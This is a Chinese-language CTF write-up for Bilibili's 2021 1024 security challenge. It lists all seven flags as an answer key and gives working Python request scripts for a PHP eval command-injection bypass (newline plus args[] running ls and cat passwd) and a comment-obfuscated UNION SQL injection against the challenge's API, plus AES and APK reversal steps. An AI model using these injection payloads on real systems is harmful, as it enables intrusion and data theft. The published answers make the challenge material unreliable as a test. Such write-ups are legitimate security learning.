當爬蟲工程師遇到 CTF丨2021 年 B 站 1024 安全攻防題解

答案參考

• 第一題：a1cd5f84-27966146-3776f301-64031bb9
• 第二題：36c7a7b4-cda04af0-8db0368d-b5166480
• 第三題：9d3c3014-6c6267e7-086aaee5-1f18452a
• 第四題：3d5dd579-0678ef93-18b70cae-cabc5d51
• 第五題：516834cc-50e448af-bcf9ed53-9ae4328e
• 第六題：b13981f4-5ae996d4-bc04be5b-34662a78
• 第七題（大部分 IP，可拿 10 分）：jj.bdc.bbb.cc,dc.bb.ii.jj,cde.ced.bbb.dd,cdd.bcc.bg.bib,cd.bb.cai.cbh,cd.baf.cae.cbc,bfh.ff.dj.jf,bfh.ff.dj.ig,bfh.ff.dj.fb,bfh.ff.dj.bd,bfh.ff.dj.bcf,bbb.bb.bjd.bhf,bbb.bb.bjd.bhc,bbb.bb.bjd.bha,bbb.bb.bjd.bgc,bba.ja.ccb.cbc,bba.ja.cca.beg

最近看到嗶哩嗶哩上線了一個 1024 程式員節的活動，其中有一個技術對抗賽，對抗賽又分為演算法與安全答題和安全攻防挑戰賽，其中安全攻防挑戰賽里面有 7 個題，其中有 APP 逆向和解密的題目，作為爬蟲工程師，逆向分析的技能也是必須要有的，于是 K 哥就以爬蟲工程師的角度，嘗試做了一下其中逆向相關的兩個題，發現逆向不是很難，分享一下思路給大家，

（以爬蟲工程師的角度分析安全攻防的題，網安大佬勿噴！部分題目解題思路來源于網安大佬）

• 1024 程式員節活動地址：https://www.bilibili.com/blackboard/20211024.html
• 安全攻防挑戰賽地址：https://security.bilibili.com/sec1024/

第一題：加密解密

第一題就給了一串密文，什么提示也沒有，作為爬蟲工程師，K 哥熟練的打開了 F12，翻了翻原始碼，這里是一個 form 表單，method="post"，下面還有一個 id 為 success 的 div 標簽，于是初步懷疑是不是把密文解密后發送個 POST 請求，然后 flag 就會顯示在這個 id 為 success 的 div 標簽下呢？有了想法，K 哥就熟練的翻起了 JS 代碼，因為我們爬蟲遇到最多的就是 JS 加密嘛，然后發現就加載了 jQuery 和一個 common.js 檔案，無論是搜索標簽還是怎樣，都沒有什么有用的資訊，

既然不存在 JS 加密，那應該就是硬解密文了，觀察這是兩段 48 位的密文，也有可能是一段 96 位的密文，而且沒有 == 之類的特殊符號，那么就不可能是最簡單的 MD5，不過 K 哥還是試了試，將其拆成 6 個 16 位、3 個 32 位等組合，發現都不是 MD5，于是又嘗試了多種加密演算法，一段作為 KEY，一段作為密文，或者整段組合成密文，SHA、HMAC、RC4 等演算法都不行，再仔細觀察網頁，K 哥懷疑這個 happy_1024_2233 是不是也是加密的一部分呢？會不會是鹽值（IV 值，也叫偏移量）？會不會它才是 KEY？結果多種嘗試，最終才得出結論：

• 加密方式：AES 加密
• 加密模式：ECB
• 填充方式：無影響，都可以
• Key：happy_1024_2233
• 96 位密文：e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156
• 輸出方式：Hex（十六進制）

解密結果（flag）：a1cd5f84-27966146-3776f301-64031bb9

有關各種加密演算法原理與實作可以查看 K 哥往期的文章：【爬蟲知識】爬蟲常見加密解密演算法

第二題：前端配置項

第二題的 flag 是 36c7a7b4-cda04af0-8db0368d-b5166480，就在 home.vue 頁面的注釋里，如下圖所示：

第三題：最好的語言

第三題說 PHP 是世界上最好的語言，給了個 eval.php，如圖所示：

本題解題思路來源于網安大佬，下載 eval.php，可以看到正則 /^\w+$/，這個可以用結尾接換行符匹配，然后就可以換行用 Linux 命令了：

使用根目錄命令 ls 一下，向 http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=ls 發送 GET 請求：

import requests

url = "http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=ls"
response = requests.get(url=url)
print(response.text)

回傳內容：

1.txt
passwd
data
config

flag 在 passwd 里，其他就不看了，所以直接使用 Linux 命令 cat passwd，向 http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=cat&args[]=passwd 發送 GET 請求：

import requests

url = "http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=cat&args[]=passwd"
response = requests.get(url=url)
print(response.text)

回傳 flag：9d3c3014-6c6267e7-086aaee5-1f18452a

第四題：SQL 注入

本題解題思路來源于網安大佬，給的網址和第二題一樣，找一下網頁上的按鈕，點日志資訊可看到日志請求，可以從日志 api 入手，抓包日志 api 為：https://security.bilibili.com/sec1024/q/admin/api/v1/log/list，繞過空格過濾嘗試通過且回顯，Python 發送 POST：

（PS：注意每次請求 user_name 欄位的變化）

import requests

url = "https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"
json_data = {
    "user_id": "",
    "user_name": "1/**/union/**/select/**/database(),user(),3,4,5",
    "action": "",
    "page": 1,
    "size": 20
}

response = requests.post(url=url, json=json_data)
print(response.text)

回傳內容：

{
     "code": 200,
     "data": {
          "res_list": [
               {
                    "action": "4",
                    "id": "q",
                    "time": "5",
                    "user_id": "test@10.34.12.128",
                    "user_name": "3"
               }
          ],
          "total": 1
     },
     "msg": ""
}

獲取表名：

import requests

url = "https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"
json_data = {
    "user_id": "",
    "user_name": "1/**/union/**/select/**/database(),user(),3,4,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()#",
    "action": "",
    "page": 1,
    "size": 20
}

response = requests.post(url=url, json=json_data)
print(response.text)

回傳內容，可以得到 flag、log、user：

{
     "code": 200,
     "data": {
          "res_list": [
               {
                    "action": "4",
                    "id": "q",
                    "time": "flag,log,user",
                    "user_id": "test@10.34.12.128",
                    "user_name": "3"
               }
          ],
          "total": 1
     },
     "msg": ""
}

獲取 flag 表的欄位，由于不能引號所以用十六進制繞過，flag 十六進制即 666c6167：

import requests

url = "https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"
json_data = {
    "user_id": "",
    "user_name": "1/**/union/**/select/**/database(),user(),3,4,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name=0x666c6167#",
    "action": "",
    "page": 1,
    "size": 20
}

response = requests.post(url=url, json=json_data)
print(response.text)

回傳內容可以得到一個欄位，id：

{
     "code": 200,
     "data": {
          "res_list": [
               {
                    "action": "4",
                    "id": "q",
                    "time": "id",
                    "user_id": "test@10.34.12.128",
                    "user_name": "3"
               }
          ],
          "total": 1
     },
     "msg": ""
}

最后直接拿下 flag：

import requests

url = "https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"
json_data = {
    "user_id": "",
    "user_name": "1/**/union/**/select/**/database(),user(),3,4,group_concat(id)/**/from/**/flag#",
    "action": "",
    "page": 1,
    "size": 20
}

response = requests.post(url=url, json=json_data)
print(response.text)

回傳內容 3d5dd579-0678ef93-18b70cae-cabc5d51 為 flag：

{
     "code": 200,
     "data": {
          "res_list": [
               {
                    "action": "4",
                    "id": "q",
                    "time": "3d5dd579-0678ef93-18b70cae-cabc5d51",
                    "user_id": "test@10.34.12.128",
                    "user_name": "3"
               }
          ],
          "total": 1
     },
     "msg": ""
}

第五題：APP 逆向

第五題是一個安卓逆向題，如圖所示：

扔到模擬器看看，大概是輸入賬號密碼，錯誤的話提示“還差一點點~~”，正確的話應該就能拿到 flag 了，

直接把 apk 扔到 JADX 里看看，沒有混淆，代碼一目了然，尤其這個 Encrypt 最為顯眼：

分析代碼：MainActivity.java 里，輸入賬號密碼賦值給 obj 和 obj2，再依次呼叫 Encrypt.java 里的方法進行按位異或 3 的運算和 base64 編碼，然后使用 Arrays.equals 方法將處理后的賬號密碼與正確的賬號密碼進行對比，正確就輸出 bilibili- ( ゜- ゜)つロ 乾杯~，不是很復雜，可以使用 Java 復現，也可以使用 Python 逆向倒推正確的賬號密碼，使用 Python 復現的時候要注意，給出的正確賬號密碼是 Java 的兩個位元組陣列，在 Python 中是沒有位元組陣列這個概念的，Python 和 Java 位元組的取值范圍也不同，Python3 是 0~256，Java 是 -127~128，所以在轉換的時候注意需要移動 256 位，Python 推導完整代碼如下：

import base64

byte_arr1 = [78, 106, 73, 49, 79, 122, 65, 51, 89, 71, 65, 117, 78, 106, 78, 109, 78, 122, 99, 55, 89, 109, 85, 61]
byte_arr2 = [89, 87, 66, 108, 79, 109, 90, 110, 78, 106, 65, 117, 79, 109, 74, 109, 78, 122, 65, 120, 79, 50, 89, 61]

byte_arr1_ = bytes(b % 256 for b in byte_arr1)
byte_arr2_ = bytes(b % 256 for b in byte_arr2)

bs64_arr1 = base64.b64decode(byte_arr1_)
bs64_arr2 = base64.b64decode(byte_arr2_)

username = password = ""

for i in range(len(bs64_arr1)):
    username += chr(bs64_arr1[i] ^ 3)

for i in range(len(bs64_arr2)):
    password += chr(bs64_arr2[i] ^ 3)

print("username: ", username)
print("password: ", password)
print("flag: ", username + "-" + password)

輸出：

username:  516834cc-50e448af
password:  bcf9ed53-9ae4328e
flag:  516834cc-50e448af-bcf9ed53-9ae4328e

在模擬器 APP 中輸入賬號密碼測驗成功：

第六題：IDA 逆向 SO

第五題和第六題題目雖然是一樣的，但是 flag 不一樣，第六題需要逆向 SO，會驗證 abi 和系統版本，改 build.prop，ro.product.cpu.abi 為 x86，ro.build.version.release 為 9，然后再創建 /data/2233，4 byte 一組就會變成 flag：b13981f4-5ae996d4-bc04be5b-34662a78

第七題：風控惡意 IP

最后一題是找到所有的惡意 IP 后，通過通過英文逗號分隔成一個字串后提交，系統會根據提交的 IP 正確數計算分數，這個題不知道具體怎么判斷，K 哥嘗試了使用 Python 把所有 IP 提取出來之后放到 Excel 里找出重復次數過多的 IP：

jj.bdc.bbb.cc,dc.bb.ii.jj,cde.ced.bbb.dd,cdd.bcc.bg.bib,cd.bb.cai.cbh,cd.baf.cae.cbc,bfh.ff.dj.jf,bfh.ff.dj.ig,bfh.ff.dj.fb,bfh.ff.dj.bd,bfh.ff.dj.bcf,bbb.bb.bjd.bhf,bbb.bb.bjd.bhc,bbb.bb.bjd.bha,bbb.bb.bjd.bgc,bba.ja.ccb.cbc,bba.ja.cca.beg

這個答案只得了 10 分，實際上好像只要有一個正確的就是 10 分，滿分是 20 分，可能有錯的或者少的，這個題肯定沒這么簡單，肯定還要利用其他判斷方法的，比如判斷 UA、Path、Referer 等，如果有思路的大佬可以評論講一下，

總結

部分題目比較簡單，只不過沒有提示，像第一題就需要熟練掌握各種加密演算法才能很快推斷出加密方式，否則只能一個一個去試了，剩下的題就需要一定的網路安全知識了，各位爬蟲大佬們也可以去試試，